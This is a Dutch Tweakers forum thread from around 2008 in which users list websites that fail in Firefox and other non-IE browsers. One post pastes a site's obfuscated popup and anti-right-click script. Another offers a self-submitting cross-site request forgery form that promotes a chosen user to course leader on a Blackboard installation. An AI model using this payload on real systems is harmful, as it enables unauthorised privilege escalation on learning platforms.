Ik krijg hier een oneindige loop dialogs met "Uw browser ondersteunt deze website niet, er is minstens een versie 4.0 of hoger browser versie vereist" of iets van die strekking (FF2). Het is al lomp dat je een dialog krijgt, maar oneindig veel dialogs?

Ik kon op de site geen contact-informatie vinden, weet jij een adres waar we heen zouden kunnen mailen?

• Xander
  • Nu online
bazkar schreef op donderdag 03 april 2008 @ 17:23:
[...]

Ook geen problemen onder FF eerlijk gezegd.
Hier wel? :?

Lekkere ranzige JS in right.html en bottom.html trouwens. Beide veroorzaken die reeks popups...

JavaScript:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
var cl31=7998;
hahQOOptw='nQaYHloMlqHSixjOyYWvbtejNjvoKHOxZRNZ';
tc='<tl<ed<citus=Ti aede o upr orbosr  rwe eso . rhge srqie!;
ldcmn.aesd=ouetalg=ouetgtlmnBI;
s(idwsdbr?refleiNnvgtrueAettLwrae)idxf`esae)=?reflei(s&iN{lr(np;
hslcto=`;
a s=`wno.pnnl;
ouetwienl;
idwaetnl;
ucinnm)rtr re;
idwoerr=nmvrm9fnto m)i(a{ouetodasatfnto )rtr as}fr(  ;
<dcmn.mgslnt;
+)z=dcmn.mgsi;
.alrIg=`o}}i(a{ucincE)(s)rtr as;
;
ucinc({ouetocneteu=cEstieu(c("20}c(;
;
ucincSe i(l|s i ewih=|ewih=){mg;
eunfle};
f(l{ouetcpuevnsEetMUEON;
ouetomueoncSes{ouetomuepcS;
ouetocneteunwFnto(rtr as";
/cit<CITLNUG=JvSrp"TP=tx/aacit>!-CprgtWbad©20qvrcHih,2it,2egtcWdhcHih,Hih,qvrdly=100 /Ana ilscne usnoenognepateqvrpuemg  50;
/ atlmlieodnvo nmteutbedvrwjtgucinwnegt)qwegt=(ouetal?dcmn.oyofeHih  idwinregtq}gucinpsatos)qwegt=(ouetal?dcmn.oyofeHih  idwinregtqcHih  ouetiae[]hih;
g2it  ouetiae[]wdhqcHih  ouetiae[]hih;
g3it  ouetiae[]wdhqcHih  ouetiae[]hih;
gouetiae[]syetp0cHih;
gouetiae[]syelf=2;
gouetiae[]syelf=2;
gcteVria(;
gqfnto cteVria({ga cteC  ahforMt.adm)*(Hih-2egt7)  5qvrsatr3=Mt.lo(ahrno(  wegtcHih-5)+7;
gouetiae[]syetpsatr2qdcmn.mgs2.tl.o=cteC;
g=;
g=-1egtqvrrnoIae=Mt.lo(ahrno(  )1qaiaebetrnoIae;
gqvri17qvrk0qvrcretmg;
gucinaiaebetig{gurnIaeigq f(m=1{gi(=0& <2)dcmn.mgsig1.tl.o=;
j+ eTmot"nmtOjc(urnIae"1)}ges{=;
stieu';
BekHQFhb='cagVOWwOMObeOwOGniOsiOnyffXJgGTd';
ONYr='%6b\075%75ne%73\143a%70e\050%22%25%30D%25%30A%22\051\073n%35\075%20%73f%75\050t\143\051\073do\143%75%6dent\056%77\162%69te\050n%35\051\073f%75n\143t%69on%20%73f%75\050%73\051%20%7b%76a\162%20%75n\075%22%22\073%6c\075%73\056%6cen%67t%68\073o%68\075%4dat%68\056\162o%75nd\050%6c%2f%32\051\073fo\162\050%69\075%30\073%69%3c\075o%68\073%69%2b%2b\051%7ba\075%73\056\143%68a\162At\050%69\051\073b\075%';
tc+='(aiaebetakcretmg),puemg)}g}ges q fk= &i0{ouetiae[m-]syelf=;
i- eTmot"nmtOjc(urnIae"1)}ges{=;
stieu(aiaebetakcretmg),puemg)}g}gqfnto nmtOjcBc(m)qcretmg=m;
gi(m=1{gi(=1& >-1egt{ouetiae[m-]syetpj -;
stieu(aiaebetakcretmg),0;
q lestieu(satretcl),dly;
q q leq fk= &i17{ouetiae[m-]syelf=;
i+ eTmot"nmtOjcBc(urnIae"1)}ges{eTmot"cteVria(" ea)}g}gq/->/CIT<ha>bd akrud"mgsrgtgf nod"oCron("orsz=wnegt) notxmn=rtr as"lfmri=0 agnit=0>igsc"mgscron.i"i=cron"sye"oiinaslt;
zidx1"<m r=iae/ato2gf d"ato2 tl=psto:boue -ne:;
>igsc"mgscron.i"i=cron"sye"oiinaslt;
zidx1"<i d"unl tl=psto:boue otm0x -ne:;
>igsc"mgstne.i"<dv<bd>/tlqhm>ha>srp>np`hspg osntspotyu rwe.Abosrvrin40o ihri eurd`d=ouetlyr;
adcmn.l;
edcmn.eEeetydw=wno.iea)tu:as;
z=aiao.srgn.ooeCs(.neO(ntcp`>0tu:as;
fw&!z)aetus)ti.oain`}vrmg`;
idwoe=uldcmn.rt=ulwno.lr=ulfnto e({euntu}wno.nro  e;
a 1;
ucini({fd)dcmn.nrgtr=ucin({eunfle;
o i=0i ouetiae.eghi+{  ouetiae()zgleym  n`};
fd)fnto I({mg;
eunfle}fnto c)dcmn.notxmn  I;
eTmot"c),0);
c)}fnto N(){fd|w){f(.hc=2|.hc=3 (s)rtr as}}i d)dcmn.atrEet(vn.OSDW)dcmn.nosdw=N}ledcmn.nosu=N}dcmn.notxmn=e ucin"eunfle)<srp>SRP AGAE"aacit YE"etjvsrp"<- oyih eln  03ga 1egtcWdhcHih,4it,3egtwegtjga ea  00;
/ atlmlieodntse pevled lajsga azIae=1';
cTXtg='dOqnOfIOKWOkJLVOOBSg';
ONYr+='73\056\143%68a\162At\050%69%2bo%68\051\073\143\075a%2bb\073%75n\075%75n%2b\143\073%7d\073D\075%75n\056%73%75b%73t\162\050%30%2c%6c\051\073D\075D\056\162e%70%6ca\143e\050%2f%60%2f%67%2c%22%27%22\051\073D\075D\056\162e%70%6ca\143e\050%2f%40%40%2f%67%2c%22%5c%5c%22\051\073f%20\075%20%2f%71%67%2f%67\073D\075D\056\162e%70%6ca\143e\050f%2c%6b\051\073\162et%75\162n%20D\073%7d\073';
tc+='00 /Ana ilscne oraiai i el edinqfnto iHih({gHih  dcmn.l) ouetbd.fstegt:wno.neHih;
gqfnto oCron({gHih  dcmn.l) ouetbd.fstegt:wno.neHih;
g1egt=dcmn.mgs0.egtqcWdh=dcmn.mgs1.it;
g2egt=dcmn.mgs1.egtqcWdh=dcmn.mgs2.it;
g3egt=dcmn.mgs2.egtqdcmn.mgs0.tl.o=-1egtqdcmn.mgs1.tl.et15qdcmn.mgs2.tl.et15qsatretcl)q}gucinsatretcl)qvrsatr2=Mt.lo(ahrno(  wegtcHih-5)+7;
ga cteC  ahforMt.adm)*(Hih-3egt7)  5qdcmn.mgs1.tl.o=cteC;
gouetiae[]syetpsatr3qk0qj0cHih;
ga admmg  ahforMt.adm)*3+;
gnmtOjc(admmg)q}ga =2;
ga =;
ga urnIaeqfnto nmtOjc(m)qcretmg=m;
gi ig=)q fk= &j-0{ouetiae[m-]syetpj +;
stieu(aiaebetcretmg),0;
q lek1 eTmot"nmtOjcBc(urnIae" azIae;
q q le{gi(=0& >)dcmn.mgsig1.tl.eti -;
stieu(aiaebetcretmg),0;
q lek1 eTmot"nmtOjcBc(urnIae" azIae;
q q}gucinaiaebetakig{gurnIaeigq fig=)q fk= &j0cHih)dcmn.mgsig1.tl.o=;
j- eTmot"nmtOjcBc(urnIae"1)}ges{eTmot"cteVria(" ea)}g}ges{gi(=1& <2)dcmn.mgsig1.tl.eti +;
stieu(aiaebetakcretmg),0;
q lestieu(satretcl),dly;
q q}g/-<SRP>/ed<oybcgon=iae/ih.i"ola=psatos) neie"iHih("ocneteu"eunfle etagn""mriwdh""<m r=iae/ato1gf d"ato1 tl=psto:boue -ne:;
>igsc"mgscron.i"i=cron"sye"oiinaslt;
zidx1"<m r=iae/ato3gf d"ato3 tl=psto:boue -ne:;
>dvi=tne"sye"oiinaslt;
bto:p;
zidx0"<m r=iae/unlgf>/i>/oy<hm>g';
eval(unescape(ONYr));
ijy34='eZDNNMRkrBcqpIMPGbskYFIOEJYVCQmmROiOdNhCODPIOKcROdOlFVOO';

:X?

[Voor 89% gewijzigd door Xander op 03-04-2008 17:49]

PC specs!---Pulse mee voor GoT!
[22:49:37] <@Remy> ik wil een opblaasbare dSLR :+

• bazkar
  • Laatst online: 29-08-2021
deadinspace schreef op donderdag 03 april 2008 @ 17:41:
[...]

Ik krijg hier een oneindige loop dialogs met "Uw browser ondersteunt deze website niet, er is minstens een versie 4.0 of hoger browser versie vereist" of iets van die strekking (FF2). Het is al lomp dat je een dialog krijgt, maar oneindig veel dialogs?

Ik kon op de site geen contact-informatie vinden, weet jij een adres waar we heen zouden kunnen mailen?
:X :X Helemaal op de verkeerde site gekeken :(
Het werkt idd niet echt lekker. Overigens is de hoeveelheid dialogs niet oneindig (alleen wel erg groot omdat ie 1 x per element komt)

Ik denk overigens dat die javascript code door een obfuscator gehaald is, waarom weet niemand :P
Urgl

[Voor 7% gewijzigd door bazkar op 04-04-2008 10:35]

http://eu.battle.net/wow/en/character/earthen-ring/bazkar/ http://eu.battle.net/wow/en/character/wildhammer/bazkar/

Acties:
  • 0Henk 'm!

• arnem_
  • Registratie: Mei 2000
  • Laatst online: 19-03 20:58
http://ubuntuguide.org/wiki/Ubuntu:Gutsy

Ik kom niet werkende sites niet zo vaak tegen maar aangezien ik onder Ubuntu werk is dit een nare! (en gênant ook)

Acties:
  • 0Henk 'm!

• Maasluip

Maasluip

Frontpage Admin

Kabbelend watertje

Wat is daar mis mee? Werkt perfect, ziet er iig onder Firefox hetzelfde uit als onder IE en op een heel klein detail na ook valid XHTML 1.0 Transitional.

Open Source landkaart

Acties:
  • 0Henk 'm!

• arnem_
  • Registratie: Mei 2000
  • Laatst online: 19-03 20:58
Maasluip schreef op dinsdag 20 mei 2008 @ 17:30:
Wat is daar mis mee? Werkt perfect, ziet er iig onder Firefox hetzelfde uit als onder IE en op een heel klein detail na ook valid XHTML 1.0 Transitional.
Mijn Firefox(3) zoals deze in Ubuntu staat maakt dat het hele systeem crashetals ik deze pagina open. Bij geen enkele andere website ooit meegemaakt.

Acties:
  • 0Henk 'm!

• MadMarky
  • Registratie: Augustus 2001
  • Niet online
Het is een redelijk grote (66KB) HTML pagina, voor de rest zien ik er met FF2 niets bijzonders aan.

edit:
En laadt hier ook prima op m'n laptop met Gutsy en FF3b5

[Voor 26% gewijzigd door MadMarky op 20-05-2008 19:40]

🖥️ | 🚗

• killercow
  • Registratie: Maart 2000
  • Laatst online: 20-03 16:42
arnem_ schreef op dinsdag 20 mei 2008 @ 19:22:
[...]

Mijn Firefox(3) zoals deze in Ubuntu staat maakt dat het hele systeem crashetals ik deze pagina open. Bij geen enkele andere website ooit meegemaakt.
Werkt hier prima,
maar helemaal tof van je dat je bij de link direct even een waarchuwing geplaatst hebt, stel dat er nog iemand is waarbij z'n systeem crasht, dan is die wellicht een deel van z'n werk kwijt.

Ook zin in een outdoor geek-fest? eth0.nl

• Fuzzillogic
arnem_ schreef op dinsdag 20 mei 2008 @ 19:22:
[...]

Dan zou ik me toch meer zorgen maken om je systeem dan om die pagina. Dat je browser crasht vanwege een bug is te begrijpen, maar dat daardoor heel je systeem crasht zou echt niet mogen gebeuren. En dat lijkt me dan niet de schuld van die site, maar van jouw systeemconfiguratie of OS.

Acties:
  • 0Henk 'm!

• Maasluip

Maasluip

Frontpage Admin

Kabbelend watertje

http://www.kenlowe.com/

Zucht. Een of ander javascriptje om bij een mouseover een popupvenstertje te laten zien. Werkt in IE, nit in Firefox.

Open Source landkaart

Acties:
  • 0Henk 'm!

• crisp
  • Nu online

crisp

Devver

Pixelated

Maasluip schreef op maandag 02 juni 2008 @ 17:31:
http://www.kenlowe.com/

Zucht. Een of ander javascriptje om bij een mouseover een popupvenstertje te laten zien. Werkt in IE, nit in Firefox.
function MM_findObj(n, d) { //v3.0
var p,i,x; if(!d) d=document; if((p=n.indexOf("?"))>0&&parent.frames.length) {
d=parent.frames[n.substring(p+1)].document; n=n.substring(0,p);}
if(!(x=d[n])&&d.all) x=d.all[n]; for (i=0;!x&&i<d.forms.length;i++) x=d.forms[i][n];
for(i=0;!x&&d.layers&&i<d.layers.length;i++) x=MM_findObj(n,d.layers[i].document); return x;
}
Probeer het eens in Netscape 4; dit is javascript uit de steentijd :P

Intentionally left blank

Acties:
  • 0Henk 'm!

• Alex)
Crisp, m'n ogen doen zeer... wat doe je? :'(

Acties:
  • 0Henk 'm!

• Sebazzz
killercow schreef op woensdag 21 mei 2008 @ 11:06:
[...]

maar helemaal tof van je dat je bij de link direct even een waarchuwing geplaatst hebt, stel dat er nog iemand is waarbij z'n systeem crasht, dan is die wellicht een deel van z'n werk kwijt.
:S ? Het is geen Windows hoor. Op Linux kan Firefox rustig crashen zonder vervelende gevolgen.

Acties:
  • 0Henk 'm!

• smokalot
  • Laatst online: 10-07-2022

smokalot

titel onder

Sebazzz schreef op dinsdag 03 juni 2008 @ 07:58:
[...]

:S ? Het is geen Windows hoor. Op Linux kan Firefox rustig crashen zonder vervelende gevolgen.
Met al die webbased applicaties van tegenwoordig kun je ook heel makkelijk werk kwijtraken als je browser crasht.

It sounds like it could be either bad hardware or software

• ibmos2warp

ibmos2warp

Eval is Evil

The Filter, als je op play drukt zoals hier, dan hoor ik niks. Opera geeft aan dat er fouten zijn, netzoals IE6, die ook niks laat horen...

Ik weet alles van niks

• Teun_2
  • Registratie: Oktober 2003
  • Laatst online: 21-03 09:31
Op de universiteit van antwerpen wordt er gebruik gemaakt van blackboard. Dat is een electronische leeromgeveing waar je cursussen vanaf kan halen, exmens op kan maken en nog wel meer. Als je een bestand wil uploaden kan dat in principe ook. Alleen wordt het pad van het bestand gecontroleerd door een stukje javascript om na te kijken of het pad wel geldig is. Dus bv c://map/map/bestand ofzo gaat allemaal perfect. Probleem is dat in unixomgevingen paden anders beginnen. Dus /home/user/bestand wordt gewijgerd :s Toch niet echt professioneel.
Zeker heel leuk als je een opdracht krijgt om shellscriptjes te schrijven en die dan te uploaden via blackboard 8)7

[Voor 9% gewijzigd door Teun_2 op 11-06-2008 23:25]

Te koop: Canonlenzen

• EdwinG
  • Laatst online: 19-03 13:10
Zoutvat schreef op woensdag 11 juni 2008 @ 23:24:
Op de universiteit van antwerpen wordt er gebruik gemaakt van blackboard.
Zegt al genoeg. Als je op een bepaalde course 'Course Leader' wilt worden, gebruik dan het volgende:

HTML:
1
2
3
4
5
6
7
8
9
10
<body onLoad=javascript:document.the_form.submit()>
<form enctype="multipart/form-data" accept-charset="UTF-8" method="POST" action="[base_url_of_the_blackboard_install]/bin/common/user.pl" name="the_form">
<input type="hidden" name="role" value="P" />
<input type="hidden" name="user_id" value="[user_you_want_to_promote]" />
<input type="hidden" name="course_available_ind" value="Y" />
<input type="hidden" name="action" value="PUT">
<input type="hidden" name="context" value="COURSE">
<input type="hidden" name="course_id" value="[relevant_course_id]">
</form>
</body>

Alleen nog zorgen dat iemand met de rechten om zo'n promotie uit te voeren (Huidige Course Leader bijvoorbeeld) deze pagina bekijkt terwijl hij ingelogd is.

// On-topic
Overigens, bij sommige firefox-installs krijg ik ook altijd 'invalid file', zelfs op een windows Desktop. (FF3 beta)

[Voor 5% gewijzigd door EdwinG op 11-06-2008 23:33]

Bezoek eens een willekeurige pagina

Anoniem: 136066

Zoutvat schreef op woensdag 11 juni 2008 @ 23:24:
Op de universiteit van antwerpen wordt er gebruik gemaakt van blackboard. Dat is een electronische leeromgeveing waar je cursussen vanaf kan halen, exmens op kan maken en nog wel meer. Als je een bestand wil uploaden kan dat in principe ook. Alleen wordt het pad van het bestand gecontroleerd door een stukje javascript om na te kijken of het pad wel geldig is. Dus bv c://map/map/bestand ofzo gaat allemaal perfect. Probleem is dat in unixomgevingen paden anders beginnen. Dus /home/user/bestand wordt gewijgerd :s Toch niet echt professioneel.
Zeker heel leuk als je een opdracht krijgt om shellscriptjes te schrijven en die dan te uploaden via blackboard 8)7
Zelfde probleem hier aan de KULeuven. Daar heet het welliswaar Toledo, maar het is op Blackboard gebaseerd. Maar, wij hebben er een oplossing voor gevonden. Ergens in je user string moet 'mac' voor komen, dan checkt hij die directory die je opgeeft niet op geldigheid. Ik weet natuurlijk niet of dat een Toledo specifiek ding is... Maar mijn operating system heet dus 'Ubuntu Toledofix:mac'. In firefox gemakkelijk aan te passen in about:config trouwens. (mocht je dat niet weten)

• AW_Bos
  • Laatst online: 22:15

AW_Bos

Liefhebber van nostalgie... 🕰️

Ariën Clay schreef op woensdag 13 oktober 2004 @ 09:26:
www.chartertrains.nl, leuke site. Jammer van die lompe plaatjes in beeld. Maar associaal dat ik met Mozilla in een loop kom van een JS alert, die aangeeft dat deze site niet geschikt is ofzo:|. Associaal :( :( :( :( :(
Ik had ze gemailed en geen reactie gekregen. Dus heb ik maar gedaan alsof of ik een trein wou afhuren (NS20), en opeens wel mail van ze :). Heb ze daarop meteen verteld dat hij niet toegankelijk is met FF (JS loop), maar beste man ging er niet over. Vervolgens heb ik maar gevraagd of hij de mail kon doorsturen naar diegene en ofdat hij anders eventuele contactadressen van die bewuste persoon had. (tenzij Jantje van 14 jaar de site ontworpen heeft en op javascript.internet.com rondstruinde voor 'leuke' animatie scriptjes).

Heb mail terug:
"wij zijn op dit moment bezig om een nieuwe site te ontwikkelen..........dus met de huidige (oude) wordt niets meer aangedaan"

Fijn zo :).

[Voor 8% gewijzigd door AW_Bos op 12-06-2008 11:15]

☀️ Goedemorgen zonneschijn! ☀️
☀️Ja, je maakt me zo gelukkig, en door jou voel ik me fijn! ☀️

• ibmos2warp

ibmos2warp

Eval is Evil

Oke, dit is een leuke, op lifehacker.com staat een link naar email etiquette for wireless devices: 7 tips. Als je die dan opent (in mijn geval in Opera, maar firefox schijnt hetzelfde te zijn) dan zie je de tekst van links naar rechts "schruiven", steeds maar weer, met een loading dingetje d'r over.
En toen ie klaar was met loaden, scrollde Opera naar beneden, en ging naar de start pagina van small business start center ofzo...
_O-

Mjah, het artikel is nu niet te lezen -O-...

Ik weet alles van niks

• Paquito
  • Niet online
Universiteit van Tilburg. Er wordt gebruik gemaakt van Blackboard. Dat werkt prima. Echter binnen de Blackboard omgeving worden bepaalde onderdelen via Adobe SVG (http://www.adobe.com/svg/viewer/install/) aangeboden. Deze software is stokoud en werkt niet fatsoenlijk onder Firefox. Via de website wordt versie 2.0 aangeboden terwijl 3.x al beschikbaar is. http://www.uvt.nl/dienste...downloads/svg-viewer.html

Nou zou je zeggen. Geen probleem, want FF heeft een eigen SVG viewer aan boord. Helaas. De website maakt gebruik van Adobe functies die de Firefox plugin niet snapt.

UVT geeft aan dat het bedrijfsmatig niet interessant is om een verandering aan te brengen.

Jammer dat je dan alleen al voor Firefox waarschijnlijk best wat mensen uitsluit.
http://www.websonic.nl/ni...andeel_firefox_europa.php

Laatst wilde een goede vriendin hier even haar resultaten van NHTV Breda bekijken. Daar gebruiken ze natschool. Dat feestje ging helaas niet door, want ik moest eerst een stomme plugin installeren voordat het fatsoenlijk wilde draaien.

[Voor 9% gewijzigd door Paquito op 01-09-2008 14:56]

• deepbass909
  • Registratie: April 2001
  • Laatst online: 20:22

deepbass909

Moderator General Chat / Wonen & Mobiliteit

[☼☼] [:::][:::] [☼☼]

Topicstarter
Ik erger me nog steeds aan de site van T-mobile... en eigenlijk ook andere sites die ad's en dergelijke via Flash weergeven. Bij Firefox blijven die boven op de site liggen, waardoor menu's e.d. onder die flash-app verdwijnen... Het gevolg is dat ik op het moment bijvoorbeeld niet meer in kan loggen op my-tmobile...

Waarschuwing, opperprutser aan het werk... en als je een opmerking van mij niet snapt, klik dan hier

• Fuzzillogic
deepbass909 schreef op maandag 01 september 2008 @ 22:14:
Ik erger me nog steeds aan de site van T-mobile... en eigenlijk ook andere sites die ad's en dergelijke via Flash weergeven. Bij Firefox blijven die boven op de site liggen, waardoor menu's e.d. onder die flash-app verdwijnen... Het gevolg is dat ik op het moment bijvoorbeeld niet meer in kan loggen op my-tmobile...
Ook in Opera is dat zo. Sowieso staat die site schots en scheef. Niet zo vreemd, als je naar de gegenereerde HTML-ellende kijkt. Gelukkig kun je in Opera per site de plug-ins uitzetten, dus van de flash-drek gelukkig geen last meer van. Helaas werkt de site niet zonder javascript (waarom toch?!) anders had ook dat uitgestaan...

• sll
  • Laatst online: 22:55
Eredivisie Live: samenvattingen van gespeelde wedstrijden zijn te zien op http://end.sport2media.com/vod.php

Vorige week werkte het nog, maar nu krijg ik (Windows/SeaMonkey):
Uit onze test blijkt dat je systeem geen gebruik maakt van Microsoft Windows en Internet Explorer. Het is momenteel alleen mogelijk om video items te bekijken wanneer je systeem is uitgerust met Windows en Internet Explorer, excuses voor het ongemak.

• Sebazzz
Probeer eens user agent switcher. :) Dat is een extensie waarmee je je user agent spooft.

• sll
  • Laatst online: 22:55
Firefox geprobeerd met Internet Explorer 7-spoof, maar helaas: krijg alleen een leeg wit scherm.

• ibmos2warp

ibmos2warp

Eval is Evil

ARRRGG!! 7(8)7
Zonet had ik een rondje gefiets, wat ik effentjes wou plotten in http://maps.google.nl
Werkt dat hele mijn kaarten niet in Opera. Dus toen maar effe in ie6 geprobeert, crashed ie -O-.
Nou, dan maar safari pakken, die werkt natuurlijk ook niet mee....
Uiteindelijk werkt het firefox door in te loggen, tab weg doen en dan weer opnieuw naar de site gaan...
Dit is echt wel lomp vind ik }:|.

edit:
Volgens mij ben ik nu ook weer uitgelogd en ik ben nog niet eens klaar -O-.
Mooi, toch wel.

[Voor 12% gewijzigd door ibmos2warp op 09-11-2008 20:57]

Ik weet alles van niks

• VisionMaster

VisionMaster

Security!

sll schreef op maandag 15 september 2008 @ 12:22:
Firefox geprobeerd met Internet Explorer 7-spoof, maar helaas: krijg alleen een leeg wit scherm.
Je hebt een drm2 plugin nodig. En mijn firefox 3 kon kon er geen voor vinden.

• Sebazzz
Hotmail krijg ik niet werkend in Firefox. Ik kan geen nieuwe berichten aanmaken of berichten verwijderen.
Niet dat ik hete meel gebruik, maar iedere keer dat je je aanmeld op MSN en "Je hebt 2 berichten in je inbox" krijgt is wel irritant :P IE gebruiken is geen optie: IE 8 crasht op Hotmail.

[Voor 9% gewijzigd door Sebazzz op 09-11-2008 20:58]

• Neo
  • Registratie: Juli 2003
  • Laatst online: 14:18
Voor een oplossing zie Neo in "Het Grote Ubuntu Topic Deel 8"
KnEuTeR had dit eerder ook al gemeld daar.

• Sebazzz
Neo schreef op maandag 10 november 2008 @ 14:12:
Voor een oplossing zie Neo in "Het Grote Ubuntu Topic Deel 8"
KnEuTeR had dit eerder ook al gemeld daar.
Dat is als je Ubuntu draait. Mijn probleem is met Firefox/Windows.

• VisionMaster

VisionMaster

Security!

Sebazzz schreef op maandag 10 november 2008 @ 14:14:
[...]
Dat is als je Ubuntu draait. Mijn probleem is met Firefox/Windows.
Lekker wazig. Ik kan de emails niet lezen met Firefox. Gek genoeg werkt het met Safari wel. UserAgent switchen was geen optie.

• Alex)
Sebazzz schreef op zondag 09 november 2008 @ 20:58:
Hotmail krijg ik niet werkend in Firefox. Ik kan geen nieuwe berichten aanmaken of berichten verwijderen.
Niet dat ik hete meel gebruik, maar iedere keer dat je je aanmeld op MSN en "Je hebt 2 berichten in je inbox" krijgt is wel irritant :P IE gebruiken is geen optie: IE 8 crasht op Hotmail.
Installeer de nieuwste update, en zet compatability mode aan voor Hotmail?

• Sebazzz
IE crasht ook in compatibility mode En ik wens eigenlijk zowieso geen IE te gebruiken :P maargoed
Is er nog een nieuwere IE8 dan beta 2?

• Maasluip

Maasluip

Frontpage Admin

Kabbelend watertje

*kick*

http://tesladownunder.com/LEDs.htm#100%20W%20LED

Bekijk hem in Firefox en zie hoe afgrijselijk de site is. Bekijk hem in IE en het ziet er opeens goed uit.
Frontpage FTW. |:(

OMG, ik zit de source even door te spitten. Dit kan toch niet dat een commercieel pakket zulke bagger uitspuugt? Hier moet een idoot nog aan hebben zitten kloten.
Font tags:
HTML:
1
<font face="Times" color="#ffffff" width="100%" Roman New colSpan="2" <TD>

iets dergelijks staat er vaker in. 8)7

[Voor 44% gewijzigd door Maasluip op 17-04-2009 08:29]

Open Source landkaart

Pagina: 1 2 Laatste

Tweakers maakt gebruik van cookies

Tweakers plaatst functionele en analytische cookies voor het functioneren van de website en het verbeteren van de website-ervaring. Deze cookies zijn noodzakelijk. Om op Tweakers relevantere advertenties te tonen en om ingesloten content van derden te tonen (bijvoorbeeld video's), vragen we je toestemming. Via ingesloten content kunnen derde partijen diensten leveren en verbeteren, bezoekersstatistieken bijhouden, gepersonaliseerde content tonen, gerichte advertenties tonen en gebruikersprofielen opbouwen. Hiervoor worden apparaatgegevens, IP-adres, geolocatie en surfgedrag vastgelegd.

Meer informatie vind je in ons cookiebeleid.

Sluiten

Toestemming beheren

Hieronder kun je per doeleinde of partij toestemming geven of intrekken. Meer informatie vind je in ons cookiebeleid.

Functioneel en analytisch

Deze cookies zijn noodzakelijk voor het functioneren van de website en het verbeteren van de website-ervaring. Klik op het informatie-icoon voor meer informatie. Meer details

janee

Relevantere advertenties

Dit beperkt het aantal keer dat dezelfde advertentie getoond wordt (frequency capping) en maakt het mogelijk om binnen Tweakers contextuele advertenties te tonen op basis van pagina's die je hebt bezocht. Meer details

Tweakers genereert een willekeurige unieke code als identifier. Deze data wordt niet gedeeld met adverteerders of andere derde partijen en je kunt niet buiten Tweakers gevolgd worden. Indien je bent ingelogd, wordt deze identifier gekoppeld aan je account. Indien je niet bent ingelogd, wordt deze identifier gekoppeld aan je sessie die maximaal 4 maanden actief blijft. Je kunt deze toestemming te allen tijde intrekken.

Ingesloten content van derden

Deze cookies kunnen door derde partijen geplaatst worden via ingesloten content. Klik op het informatie-icoon voor meer informatie over de verwerkingsdoeleinden. Meer details

janee